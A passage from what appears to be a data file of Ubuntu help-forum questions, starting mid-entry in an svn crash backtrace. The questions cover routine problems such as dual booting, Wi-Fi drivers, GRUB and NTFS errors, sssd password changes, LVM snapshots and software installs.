svn_ra_serf__handle_xml_parser ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 11 0x00007fee1568e1d2 in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 12 0x00007fee140d13c5 in serf__process_connection ( ) from /usr/lib/x86_64-linux-gnu/libserf-1.so.1 # 13 0x00007fee140cfbeb in serf_event_trigger ( ) from /usr/lib/x86_64-linux-gnu/libserf-1.so.1 # 14 0x00007fee140cfd17 in serf_context_run ( ) from /usr/lib/x86_64-linux-gnu/libserf-1.so.1 # 15 0x00007fee1568994f in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 16 0x00007fee16fb9bee in svn_wc_crawl_revisions5 ( ) from /usr/lib/x86_64-linux-gnu/libsvn_wc-1.so.1 # 17 0x00007fee172a0c0f in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_client-1.so.1 # 18 0x00007fee172a142d in svn_client__update_internal ( ) from /usr/lib/x86_64-linux-gnu/libsvn_client-1.so.1 # 19 0x00007fee17264680 in svn_client__checkout_internal ( ) from /usr/lib/x86_64-linux-gnu/libsvn_client-1.so.1 # 20 0x00007fee17264802 in svn_client_checkout3 ( ) from /usr/lib/x86_64-linux-gnu/libsvn_client-1.so.1 # 21 0x0000000000408240 in ? ? ( ) # 22 0x000000000041c5e1 in ? ? ( ) # 23 0x0000000000406cfe in ? ? ( ) # 24 0x00007fee15f0778d in __libc_start_main ( ) from /lib/x86_64-linux-gnu/libc.so.6 # 25 0x0000000000406d41 in ? ? ( ) # 26 0x00007fff410ed3e8 in ? ? ( ) -- -type < return > to continue , or q < return > to quit -- - # 27 0x000000000000001c in ? ? ( ) # 28 0x0000000000000006 in ? ? ( ) # 29 0x00007fff410ee797 in ? ? ( ) # 30 0x00007fff410ee79b in ? ? ( ) # 31 0x00007fff410ee7a4 in ? ? ( ) # 32 0x00007fff410ee7cc in ? ? ( ) # 33 0x00007fff410ee7ce in ? ? ( ) # 34 0x00007fff410ee7e0 in ? ? ( ) # 35 0x0000000000000000 in ? ? ( ) at last it turn to be : ca n't del even use root : slave2/2totalbuild/build # ls -a . .. .svn slave2/2totalbuild/build # rm -rf .svn rm : can not remove `.svn/pristine/a5 ' : directory not empty seem it has a wrong name in int : slave2/2totalbuild/build # ls -il .svn/pristine/a5/ ls : can not access .svn/pristine/a5/a518570f51cc384f4e5`5ef1934c99e6abb12129.svn-base : no such file or directory total 0 ? - ? ? ? ? ? ? ? ? ? ? ? ? ? ? a518570f51cc384f4e5`5ef1934c99e6abb12129.svn-bas the answer is how can i rm this file ?
512736	lost sound in 14.04	i 'm dual booting ubuntu 14.04 on a windows 8.1 machine . no problems so at all until i lost sound in ubuntu . works fine in windows , but ubuntu is my primary os now . problem began when i downloaded pithos , which i have since uninstalled . any help out there ?
512737	ubuntu dual-boot .exe - windows 7	i installed ubuntu some time ago , maybe a year , and it easily installed next to windows 7 . all i did was download ubuntu and run the software , it then took me to a partition screen and let me make a partition on my unused space in my windows partition . after that i installed ubuntu and upon booting was able to select windows or linux . is this feature still in existence ? it seemed like a nice method , much simpler than making a boot disk or otherwise , any ideas why was it removed ? is there still a way to enable this feature so i do n't have to install from a disk or usb ? i ask because i do n't want to buy a pack of dvds as i am a poor student and i need to use linux to wipe a mac-formatted usb drive formatted long ago on a mac which is not at my disposal . i uninstalled ubuntu because it was running poorly , my guess because it was sharing a partition or some such . the install process was similar to the one on the ubuntu site it just did n't require any external media , just an .exe if i remember correctly . all my searches for this feature just turn up the same ubuntu install directions via external media . maybe they were breaching some sort of microsoft legal shenanigans ? maybe i 'm just not remembering clearly , but if this exists still and anybody can point me in the direction it 'd be much appreciated . thanks in advance .
512738	locking , freezing , slow response right after installment	i 've installed 4 different versions of linux onto an old computer that had xp on it . the 32 , 64 amd , 64 , and old 11.0.1 version . they all either crashed or wo n't respond to mouse and keyboard inputs . it 's the first time i 've installed them onto a computer . right now i have 64 bit on the computer , the login is fine , the mouse is moving normally , the keyboard is working fine . when i logged in to the desktop , and moved the mouse , it did n't respond right away . the mouse will stay in one place for a minute or maybe 5 minutes , i did n't time it , then pop up in a different position on the screen , or do n't even move at all . keyboard does n't respond to shortcuts either . one time when i logged in and tried to click the firefox , linux crashed/froze , a combination of both . the screen got distorted and i could n't see the desktop at all . the desktop computer belonged to my roommate before he abandoned it because it was old and slow . the computer i 'm using is a dell dimension c521 amd64 athlon x2 , a small print on it said it 's designed to work with microsoft windows xp professional . i 'm at loss at why linux is having problems running on this particular machine . i do not know what motherboard it have nor graphic card if any ( i will go with the assumption that it is on the board ) . is there any way to resolve this ? i ca n't do much in linux os , the only thing i can do is use the boot option and the bios , log in , that 's all i can do . can anyone assist me with this difficulty ? i 'm installing linux on this because the school i 'm going to require that we know how to use linux . the version that is currently on the computer is ubuntu 14 , 64 bit , the latest one .
512740	locking all setting	is there a way to lock all the system setting on ubuntu so people cant change them without permission ? example removing printers . i am taking care of a schools computer room and teachers/students are complaining they cant print out anything , when i check the computer the printers where removed . that is after i installed then again . thanks
512741	keyboard and mouse both ps2 and usb not working after installing ubuntu	we are installed ubuntu 14 os after that keyboard and mouse not working our mother board is gigabyte ga-m61pme here that thier is ioomu setting
512742	installing ubuntu alongside pre-installed windows 8	i am currently trying to install ubuntu on my new laptop that came with windows 8 pre-installed . here 's what i have done : - created bootable flash drive with ubuntu installer - created a partition ( ext4 ) using half of my total hard drive space ( around 225 gb ) the problem i encounter is that ubuntu is not detecting any os , which in this case would be my windows 8 . i think i may be able to just manually choose my newly created partition , but i am still hesitant to proceed because of this . i 'm not sure exactly what i should do . i want to install it permanently anyway , but i was under the impression that there would be an option for `` try ubuntu '' and i only see `` install ubuntu '' , and i do n't want it to somehow mess up my current os , as i want to be able to boot into either one . i noticed that people had said in other places to disable quickboot in the bios , and i have n't figured out how to do this . i disabled fast startup , but i am pretty sure that is n't the same thing . i went ahead and installed , and it seems to be working fine . i was wondering though , i only created the root abd swap partitions , and i noticed that it was suggested there be 3 , root , home and swap , with home being the disk for most if the memory . should i format the partition , create the home partition and then reinstall ?
512743	encrypted usb stick grub rescue	i have a 16gb usb stick on which i installed xubuntu ( i believe 12.04 ) . everything was working fine for months until i tried to create a backup image of usb usin mac . now when i try to boot my laptop using the usb stick i get grub rescue . usb stick was encrypted and i have the password but can not get in to copy my data back . any help would be greatly appreciated .
512744	gave up waiting for root device when booting , but uuid matches	i am getting a `` gave up waiting for root device '' error message whent trying to boot into ubuntu . live cd works perfectly , and i 've tried running the boot repair with no success , it seemed to have failed . http : //paste.ubuntu.com/8077003/ i 've checked the grub configuration ( through grub customizer ) , and it looks to be booting to the right device . the uuid it 's trying to boot to is f74a304c-58c9-4689-be48-b95b5a84346a which matches the configuration . is there anything else i can try ? thanks !
512745	problem in creating free space for root , swap and home	i 'm trying to install ubuntu 14.04 alongside windows 7 . i 'm done with the partition part where , i 've created a free space of 50gb for root , swap and home directories . i 'm using liveusb to install ubuntu . everything went fine until they asked about the installation type , as i chose something else for installation type . but , the main problem is that i ca n't see the free space which i 've allocated beforehand . i can see the following devices : /dev/sda /dev/sda1 /dev/sda2 /dev/sda3ntfs /dev/dsa4ntfs what might be the problem ? help me asap .
512747	problems with network adapter ar956x on new laptop	i just bought a new laptop asus x451ma with wireless adapter atheros ar956x in which i want to use mostly ubuntu . well , i 've just installed ubuntu 14.01 from an usb , but when i get to the section where you can choose the wifi , i typed the password and nothing happened . i let it install and after installed i 've tried again but there was no success , i still can not connect to the wifi . it appears that the problem is the atheros ar9565 wireless adapter , i 've tried using a usb tplink wireless adapter and it worked just fine . so guys please help me , i do n't know what to do to make my laptop wireless adapter work . i ca n't find any info on the internet about that drivers , i ca n't connect to the internet using the usb adapter , so please tell me what can i do . i fear my laptop wo n't have support for that driver , so everything is going to waste because i need to use linux for school . thank you .
512748	how to get rid of full screen in ubuntu games	how do i get rid of full screen mode in games ? i tried system settings then windows but that still does n't work . does any one know how to get rid of full screen on ubuntu games ?
512750	how do i recall the `` you have just entered a dvd '' prompt after banishing it ?	my question is nearly an inverse of this one : how do i banish the `` you have just inserted an audio cd . '' dialog forever ? a long time ago , i selected `` do nothing '' and checked `` always perform this action '' , but now i have changed my mind and would like totem to open when i insert a dvd . if i recall correctly , this setting used to be in the nautilus preferences , and later in the system settings , but i have no idea where it is now !
512751	flashplayer not working in chromium	i am using chromium version 36.0.1985.125 on ubuntu 12.04 . my flashplayer is working just fine in firefox , but it is not working in chromium . i get the message `` flashplayer upgrade required '' when i try to play flash videos . is there any solution to this ? i searched around this problem , and tried some solutions such as : reinstalling flashplayer updating packages installing from software center copying the flashplugin-alternative.so from firefox library to chromium library installing pepperflashplugin-nonfree but got package 'pepperflashplugin-nonfree ' has no installation candidate searching pepperflash in the software center and could n't find it . here is the output of command dpkg -l \*flash\* : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===================================================-===================================================-====================================================================================================================== un adobe-flash-properties < none > ( no description available ) un adobe-flash-properties-gtk < none > ( no description available ) un adobe-flash-properties-kde < none > ( no description available ) un adobe-flashplugin < none > ( no description available ) un flashplayer-mozilla < none > ( no description available ) un flashplugin < none > ( no description available ) un flashplugin-downloader < none > ( no description available ) ii flashplugin-installer 11.2.202.400ubuntu0.12.04.1 adobe flash player plugin installer un flashplugin-nonfree < none > ( no description available ) un libflashsupport < none > ( no description available ) does anybody know the answer to this question ?
512753	`` /usr/sbin/grub-probe : error : failed to get canonical path of ` ' . '' '' when using grub customizer	i updated to ubuntu 14.04.1 and now i ca n't get into grub customizer . i am getting the following errors : chroot '/media/grub-customizer_recovery_root_mountpoint ' grub-mkconfig could n't be executed successfully . error message : generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found linux image : /boot/vmlinuz-3.2.0-67-generic found initrd image : /boot/initrd.img-3.2.0-67-generic found linux image : /boot/vmlinuz-3.0.0-32-generic found initrd image : /boot/initrd.img-3.0.0-32-generic found linux image : /boot/vmlinuz-2.6.38-10-generic found initrd image : /boot/initrd.img-2.6.38-10-generic found linux image : /boot/vmlinuz-2.6.38-7-generic found initrd image : /boot/initrd.img-2.6.38-7-generic cat : /video.lst : no such file or directory /usr/sbin/grub-probe : error : failed to get canonical path of ` ' . no path or device is specified . usage : grub-probe [ option ... ] [ option ] ... [ path|device ] try 'grub-probe -- help ' or 'grub-probe -- usage ' for more information . any ideas or help ?
512755	parallels xubuntu14.04 resolution always 800*600	i install parallels tools and reboot the machine , but the resolution is still 800*600 . no xorg.config . [ datastring ] found .
512757	linux terminal : keyboard shortcut for moving across tabs	is there any way to move across the different tabs in linux terminal like ctrl + tab for moving across different tabs in web browsers . i have tried alt + 1 , alt +2 etc ... for moving along the ordered tabs . but it will not work more than nine tabs . is there any other keyboard shortcut to move across the tabs ?
512762	vmware 3d acceleration ubuntu 14.04	i have installed vmware player 6.0.3 build-1895310 . the problem i have is that when i run a windows 7 vm , it says that 3d support was disabled . ( i ca n't read the exact report atm because it has a chance of crashing my machine . ) i have the 3d support box enabled . here is my graphics card : mobile intel速 gm45 express chipset x86/mmx/sse2 . can anyone tell me to install drivers or something ? i ca n't find mine anywhere !
512765	how to setup phpmyadmin as subdomain on apache 2.4.7 ?	i 'm currently having issues setting up phpmyadmin as a subdomain . i was able to do this on ubuntu 12.04 no problem but since upgrading ca n't seem to get it properly configured . here 's the conf i 'm trying to load : < virtualhost *:80 > servername sub.domain.com serveralias www.sub.domain.com documentroot `` /usr/share/phpmyadmin '' < directory /usr/share/phpmyadmin > options followsymlinks directoryindex index.php < ifmodule mod_php5.c > addtype application/x-httpd-php .php php_flag magic_quotes_gpc off php_flag track_vars on php_flag register_globals off php_admin_flag allow_url_fopen off php_value include_path . php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp php_admin_value open_basedir /usr/share/phpmyadmin/ : /etc/phpmyadmin/ $ < /ifmodule > < /directory > < directory /usr/share/phpmyadmin/libraries > # allowoverride all # require all granted order deny , allow deny from all < /directory > < directory /usr/share/phpmyadmin/setup/lib > # allowoverride all # require all granted order deny , allow deny from all < /directory > < /virtualhost >
512766	sssd password change not working with ldap backend	environment info : ad on win 2k8r2 ubuntu 12.04.5 lts sssd v1.8.6 everything is in the same vlan i have an ldap / sssd solution in use on our ubuntu servers . the auth process works correctly - ie users can log in fine and do whatever they need . when anyone tries to change their password they see this : user @ host : ~ $ passwd current password : new password : reenter new password : password change failed . passwd : authentication token manipulation error passwd : password unchanged the new password meets all of the ad requirements . i see this in /var/log/auth.log : aug 18 15:22:12 hostname passwd [ 7544 ] : pam_unix ( passwd : chauthtok ) : user `` user '' does not exist in /etc/passwd aug 18 15:22:16 hostname passwd [ 7544 ] : pam_unix ( passwd : chauthtok ) : user `` user '' does not exist in /etc/passwd aug 18 15:22:21 hostname passwd [ 7544 ] : pam_sss ( passwd : chauthtok ) : system info : [ generic error ( see e-text ) ] aug 18 15:22:21 hostname passwd [ 7544 ] : pam_sss ( passwd : chauthtok ) : user info message : password change failed . aug 18 15:22:21 hostname passwd [ 7544 ] : pam_sss ( passwd : chauthtok ) : password change failed for user user : 20 ( authentication token manipulation error ) i have tried using a few different settings in sssd.conf for ldap_default_bind_dn , all of which allow users to auth , but not change their password . no idea what 's stopping it - feels like it should just be a config change and it will all be fine , but not sure what i need to change . config files : /etc/sssd/sssd.conf [ sssd ] config_file_version = 2 domains = ldap services = nss , pam debug_level = 10 [ nss ] [ pam ] [ domain/ldap ] enumerate = false id_provider = ldap # ldap_access_filter = memberof=cn=xxxx , cn=xxxx , dc=xxxx , dc=xxxx ldap_uri = ldap : //xxx.xxx.xxx.xxx # ad server ip ldap_search_base = ou=xxxx , dc=xxxx , dc=xxxx ldap_tls_reqcert = demand ldap_id_use_start_tls = false ldap_tls_cacert = /etc/ssl/certs/ca-certificates.crt ldap_schema = rfc2307bis ldap_user_object_class = person ldap_group_object_class = group ldap_default_bind_dn = cn=xxxx , cn=xxxx , dc=xxxx , dc=xxxx ldap_default_authtok_type = password ldap_default_authtok = ********* ldap_user_gecos = displayname ldap_user_home_directory = unixhomedirectory min_id = 10000 ldap_user_principal = userprincipalname ldap_force_upper_case_realm = true auth_provider = krb5 chpass_provider = krb5 krb5_server = xxx.xxx.xxx.xxx # ad server ip krb5_kpasswd = xxx.xxx.xxx.xxx # ad server ip krb5_realm = xxxx.xxxx # upper caseof the domain krb5_changepw_principle = kadmin/changepw krb5_auth_timeout = 15 krb5_store_password_if_offline = true krb5_renewable_lifetime = 14d krb5_renew_interval = 60 debug_level = 9 /etc/krb5.conf [ logging ] default = file : /var/log/krb5libs.log kdc = file : /var/log/krb5kdc.log admin_server = file : /var/log/kadmind.log [ libdefaults ] default_realm = xxxx.xxxx # capitalised domain realm = xxxx.xxxx # capitalised domain dns_lookup_realm = true dns_lookup_kdc = false ticket_lifetime = 24h renew_lifetime = 7d forwardable = true default_etypes = arcfour-hmac-md5 default_etypes_des = des-cbc-crc default_tkt_enctypes = arcfour-hmac-md5 default_tgs_enctypes = arcfour-hmac-md5 [ realms ] xxxx.xxxx= { kdc = xxx.xxx.xxx.xxx:88 # ad server ip kpasswd_server = xxx.xxx.xxx.xxx:464 # ad server ip default_domain = xxxx.xxxx # capitalised domain } [ domain_realm ] .xxxx.xxxx = xxxx.xxxx # lower = cap domain xxxx.xxxx = xxxx.xxxx /etc/pam.d/common-password : password [ success=2 default=ignore ] pam_unix.so obscure sha512 password sufficient pam_sss.so password requisite pam_deny.so password required pam_permit.so
512767	after re-opening laptop , programs blink with each keystroke , ubuntu 12.04 , dell latitude d620	i 'm running ubuntu version 12.04 on dell d620 laptop and have been for months . everything has been working fine until a week ago , when suddenly every time i close the laptop and open it again , the program in use blinks each time i make a keystroke . only the program blinks , not the whole screen . rebooting solves the issue until i close the lid again . i have installed all the updates recommended in the package manager . i can suspend before closing the laptop , then when i open the laptop the problem sometimes does n't occur like it normally does . clues ?
512770	what is use of command : `command` ?	recently i found command : command which has no manual entry but help displays as follows : $ help command command : command [ -pvv ] command [ arg ... ] execute a simple command or display information about commands . runs command with args suppressing shell function lookup , or display information about the specified commands . can be used to invoke commands on disk when a function with the same name exists . options : -p use a default value for path that is guaranteed to find all of the standard utilities -v print a description of command similar to the `type ' builtin -v print a more verbose description of each command exit status : returns exit status of command , or failure if command is not found . is command -v is alternative of which ? what arguments are accepted by this command and how/when to use command ?
512775	qt project compile error can not find -lgl	i tried to compile qt ( 5.3.1 ) example project but the following error comes up /usr/bin/ld : can not find -lgl what does it mean . this error does n't come up when i compile it in windows . so how do i fix it ?
512776	tp-link tp-wn727n not working on ubuntu 14.04.1	i have posted in another thread asking how to install driver for tl-wn722n . however , as i am really eager to fix the problem sooner and i noticed that someone said ubuntu has already installed the driver of tl-wn727n , i have just gone to buy a new tl-wn727n . however i still can not get this adaptor work . having checked with `` lsusb '' , i can see the device shown in the terminal : `` bus 002 device 003 : id 148f:7601 ralink technology , corp. '' i am using the ubuntu 14.04.1 . could you help me to get the adaptor work ? thank you i plug the adaptor into the laptop and then switch on the laptop . then run sudo iwconfig result : wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off lo no wireless extensions . eth0 no wireless extensions .
512777	unity top bar 100 % transparent	just wondering if anyone knows how to get unity 's top bar to be 100 % transparent . i have it so on my second screen , but it seems to add a bit of a background on my main screen . see the screenshot below for what i 'm talking about .
512779	dropbox upgrade	this morning , via email from dropbox , i received notification that the version of dropbox i am running on ubuntu 14.04lts will be retired next week and to update to the latest version . the email takes you to this page on their website : dropbox was initially installed using the ubuntu software centre . for the inexperienced user , is it best/easier to remove the package from within the usc and then re-install or is there a more elegant way of obtaining the update , for example using sudo apt-get update dropbox ?
512787	how to mount partitions from old computer and recover files	computer-a crashed and wo n't boot , so i set up computer-b to work from . i installed the boot drive from comp.-a into comp.b , the drive shows in disks program but only one partition is visible in files ( the 255mb partition ) - the os and personal files are not visible to me . partitions view - http : //s26.postimg.org/70xjywxq1/500gb_drive.png files view - http : //s26.postimg.org/te5alpynt/files.png i 'm sure it 's an easy fix , but i am fairly new to linux . i do n't know what to do to find my personal files from my profile on the comp.-a 500gb drive . can someone please point me in the right direction to recovering my files ? thank you .
512789	after upgrade to 14.04 kernel remains 3.2.0	i upgraded from 12.04 to 14.04.1 using the update-manager . during the upgrade there was an error about emacsen-common and i do not overwrite the file menu.lst . after the upgrade lsb_release -a gives 14.04.1 but when i boot in the boot menu i have only entry 12.04 with kernel 3.2.0 . however , after booting lsb_release gives still 14.04. but uname -r gives 3.2.0 . how can i have in the boot menu 14.04. ? why i do not get the new kernel 3.13 and how can i upgrade to it ?
512790	how would you alert a fellow member a link is broken without commenters status ?	i have discovered a link in a users answer , where the link is directed to a website that is no longer available . how would you indicate that link as broken without the ability to leave a comment ?
512793	upgraded 12.04 lts to 14.04 lts now wireless networking is disabled	i have just upgraded from 12.04 to 14.04 . the upgrade process went off smoothly , only asked if i wanted to keep some old configs ( which i did ) and i restarted the computer when finished . the computer is a hp envy m6 ( less than a year old ) originally with windows 8 which i completely nuked in favor of ubuntu about five months ago . this install has worked almost flawlessly since it was done . there was a minor problem early on with something i ca n't remember now as it was resolved in an update . however , after this update to 14.04.1 i do not now have any wireless connectivity . this is what i have tried so far . restart the computer . no effect . i tried the pressing the wireless function key , also no effect either way . the light did n't even go out . i also tried disabling and reenabling networking from the menu at the top of the screen . the same , no effect . after googling i have tried lshw , this provided the clue : under *-pci:2 with the description : pci bridge *-network disabled description : wireless interface product : rt3290 wireless 802.11n 1t/1r pcie ... bus info : pci @ oooo:08:00.0 ... configuration : broadcast=yes driver=rt2800pci driverversion=3.13.0-34-generic firmware=0.37 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c1510000-c151ffff ... please note , since there is no network on the laptop , i have typed this out by hand . i have tried to include what i think might be relevant , if you need more detail please ask . further to this and after some googling i attempted to : sudo iwlist wlan0 scanning ( which resulted in ) wlan0 interface does n't support scanning : network is down and sudo ifconfig wlan0 up ( which resulted in ) siocsifflags : input/output error most of the relevant information i 've found seems to revolve around lshw and ifconfig ( which fails badly for me . ) can anyone help me work out what to do here ? thanks . update okay . some new info . last night when i left , i suspended the laptop ( as i usually do ) rather than shutting down . when i came in and woke the computer this morning , the wireless was back up and working . i have not tried restarting yet , i have a lot of work to do and do n't want to spend time messing around with it quite yet .
512794	update-alternatives creating symlink to directory instead of file	i ran update-alternatives -- install /usr/bin/java java /opt/jdk/jdk1.8.0_11/bin/java 100 it is creating symlink named java to /opt/jdk/jdk1.8.0_11/bin/ instead of /opt/jdk/jdk1.8.0_11/bin/java inside /usr/bin/ . how do i fix it ?
512800	errors while installing aircrack-ng	make -c src all make [ 1 ] : entering directory `/home/ibrahim/aircrack-ng-1.2-beta3/src' gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=0 -dconfig_libnl30 -i/usr/include/libnl3 -wno-unused-but-set-variable -wno-array-bounds -iinclude -c -o aircrack-ng.o aircrack-ng.c in file included from aircrack-ng.c:69:0 : crypto.h:50:26 : fatal error : openssl/hmac.h : no such file or directory # include < openssl/hmac.h > ^ compilation terminated . make [ 1 ] : *** [ aircrack-ng.o ] error 1 make [ 1 ] : leaving directory `/home/ibrahim/aircrack-ng-1.2-beta3/src' make : *** [ all ] error 2
512806	dependency is not satisfiable : libtiff5 , when trying to install lightworks on ubuntu 12.04	i really need to install this because i 'm tired of openshot and other similar video editors but when i try , this shows : dependency is not satisfiable : libtiff5 . what can i do ?
512808	huge kde system tray icons in kubuntu 14.04	my kde system tray icons are huge in kubuntu 14.04 : notice that the skype and wicd icons are sized properly , these are not kde apps . however the kde apps ' icons ( klipper and volume control ) are huge . i have checked and i already have the `` improve systemtray on hidpi displays '' patch applied on my system : file : a/plasma/generic/applets/systemtray/package/contents/ui/iconslist.qml - > file : b/plasma/generic/applets/systemtray/package/contents/ui/iconslist.qml -- - a/plasma/generic/applets/systemtray/package/contents/ui/iconslist.qml +++ b/plasma/generic/applets/systemtray/package/contents/ui/iconslist.qml @ @ -33,7 +33,7 @ @ id : root_item property int icons_size : 24 /// < size of icons , icons are square i.e . width == height - property int icons_margins : 4 /// < margins for icons + property int icons_margins : icons_size/3 /// < margins for icons property alias icons_number : repeater.count /// < [ readonly ] number of icons property alias model : repeater.model ; /// < model for grid property int cell_size : icons_size + 2*icons_margins /// < [ readonly ] size of grid cell file : a/plasma/generic/applets/systemtray/package/contents/ui/main.qml - > file : b/plasma/generic/applets/systemtray/package/contents/ui/main.qml -- - a/plasma/generic/applets/systemtray/package/contents/ui/main.qml +++ b/plasma/generic/applets/systemtray/package/contents/ui/main.qml @ @ -34,7 +34,7 @ @ property int minimumwidth : js.minimum_size property int minimumheight : js.minimum_size - property int iconsize : math.min ( root_item.width , math.min ( root_item.height , js.icons_size ) ) + property int iconsize : math.min ( root_item.width , math.min ( root_item.height , theme.defaultfont.msize.height < 20 ? 24 : theme.largeiconsize ) ) //math.min ( root_item.width , math.min ( root_item.height , js.icons_size ) ) // data models property list < listmodel > models : [ @ @ -112,7 +112,7 @ @ content : iconslist { id : popup_area - icons_size : js.icons_size + icons_size : root_item.iconsize model : model_popup } } considering that i already have the patch , what might be the cause of the huge kde system tray icons ?
512809	pulseaudio - sound starts to get distorted/crackling after supsend	first off , i know there are lots of threads but none helped me yet . basically my audio output works great , but for some reason it starts to get distorted . i think it is related to the suspend . after i wake my pc from suspension the sound starts to be crackling/distorted . the most common advice i found is to append tsched=0 to the line load-module module-udev-detect in the file /etc/pulse/default.pa . however , this did not changed anything . the only `` solution '' i found is to execute the following command : killall pulseaudio ; rm -r ~/.config/pulse* this fixes my issue . however , the issue will occur probably after the next suspend . do you maybe have any solution ?
512813	ntfs mount problem + ntfsfix problem	i install ubuntu and now my windows ca n't boot and ubuntu too ! ubuntu error message is same to this ! and windows error is `` a disk read error occurred '' i cant install windows but windows 7 installation disk ca n't detect my hdd and windows xp 's disk show me a `` blue screen '' and active boot disk ca n't show my partitions . i only can run ubuntu live disk and ubuntu detect and show me hdd partitions . but one of my drives can not mount in ubuntu . when i try to open my drive , ubuntu show me this message : error mounting : mount exited with exit code 13 : ntfs_mst_post_read_fixup : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument actual vcn ( 0x0 ) of index buffer is different from expected vcn ( 0x1 ) . failed to mount '/dev/sda3 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . my hdd is not raid.i read same questions and find a solution ! ntfsfix . but ... when i run ntfsfx : $ sudo ntfsfix /dev/sda3 mounting volume ... ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument actual vcn ( 0x0 ) of index buffer is different from expected vcn ( 0x1 ) . failed attempting to correct errors ... processing $ mft and $ mftmirr ... reading $ mft ... ok reading $ mftmirr ... ok comparing $ mftmirr to $ mft ... ok processing of $ mft and $ mftmirr completed successfully . setting required flags on partition ... ok going to empty the journal ( $ logfile ) ... ok ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument actual vcn ( 0x0 ) of index buffer is different from expected vcn ( 0x1 ) . remount failed : input/output error p.s . this partition is major for me .
512814	how to install gnu make 4.0 on ubuntu 12.04	i need gnu make 4.0+ because of the new file function . how can i install this on ubuntu 12.04 ? i tried the .deb , but it depends on libc6 2.17 .
512816	proper way to remove an active / inactive lvm snapshot	i have created a sample ruby script file for removing extra lvm snapshots from the system . for removing lvm snapshot , we are using lvremove command . this command is working fine and we can remove snapshots from the system . # sudo lvremove /dev/ops/dbbackup lvremove -- do you really want to remove `` /dev/ops/dbbackup '' ? [ y/n ] : y sometimes while removing snapshots we are getting following errors . unable to deactivate open rootfs_12.10_20140812_00-cow ( 252:8 ) failed to resume rootfs_12.10_20140812_00 . libdevmapper exiting with 7 device ( s ) still suspended . the system gets frozen . we can not fire any command or can not perform any action on it . after restarting the system , it is functioning fine . we can perform all the operations even we can delete that snapshot also . i searched about it i found these threads https : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=659762 and https : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=674682 solution from this thread is after getting the error but i have to avoid this type of error . i have a question , is there any better way removing lvm snapshots ? so that we can avoid this type of error . if anyone needs more info feel free to ask me .
512817	exchange online account : failed to find asurl and oaburl in autodiscover response	i have configured an exchange online account that was working flawlessly for the last months . it is a company account for office 365 and i 'm using https : //outlook.office365.com/ews/exchange.asmx as host url . last week it suddenly stopped working with this error message : the reported error was `` invalid password with username 'my.name @ company.com ' ( goa-error-quark , 0 ) : failed to find asurl and oaburl in autodiscover response '' . the credentials are not wrong , they are the same i use on outlook.com and they worked till last week .
512818	how to install gitg 0.3.3 on ubuntu 14.04 ?	i want to install gitg version 0.3.3 on ubuntu 14.04 . how can i do that ?
512820	is it possible to install libtiff5 on ubuntu 12.04 ?	i 'm trying to install lightworks , but it says i need libtiff5 . now , i 've read that libtiff4 is for ubuntu 12.04 , but i 've seen a youtube video where the person istalled the same version of lightworks i want on 12.04 without any problems . help please !
512821	no gui after upgrading from 12.04 to 14.04.1	yesterday i upgraded ubuntu version from 12.04 to 14.04 from update manager . after upgrading it , my system got automatically restarted and now i am not able to switch to gui mode . its showing me command prompt mode only . i have tried ctrl + alt + f7 & sudo apt-get install ubuntu-desktop and all but its not responding . i am newbie in ubuntu so i do n't have much idea that what 's going wrong with it . how can i switch to gui mode now . update : i have tried sudo apt-get -f install and now somehow i manage to get login screen . after this when i was trying to login , it was throwing me back to login screen . so i tried to reinstall xubuntu desktop sudo apt-get install xubuntu-desktop -- reinstall . but now when i am trying to login i am getting popup-warning saying unable to launch startxfce4 .
512825	sub-process /usr/bin/dpkg returned an error code ( 100 )	i executed the command sudo apt-get install ros-fuerte-openni-camera ros-fuerte-openni-launch and i am getting this error : 0 upgraded , 32 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/93.4 mb of archives . after this operation , 356 mb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % could not exec dpkg ! e : sub-process /usr/bin/dpkg returned an error code ( 100 )
512827	what does this command do ? mount -rw -o remount /	i have windows 7 and ubuntu 14 installed side by side on the machine i 've lost my root password , then i read this tutorial http : //www.sysads.co.uk/2014/05/reset-lost-root-password-ubuntu-14-04/ on how to recover lost ubuntu root password but i did not understand what this command mean ? mount -rw -o remount / i need to know that this command do and what is mounting/unmounting ? i 'm afraid it may cause any data loss for me ? ? thanks
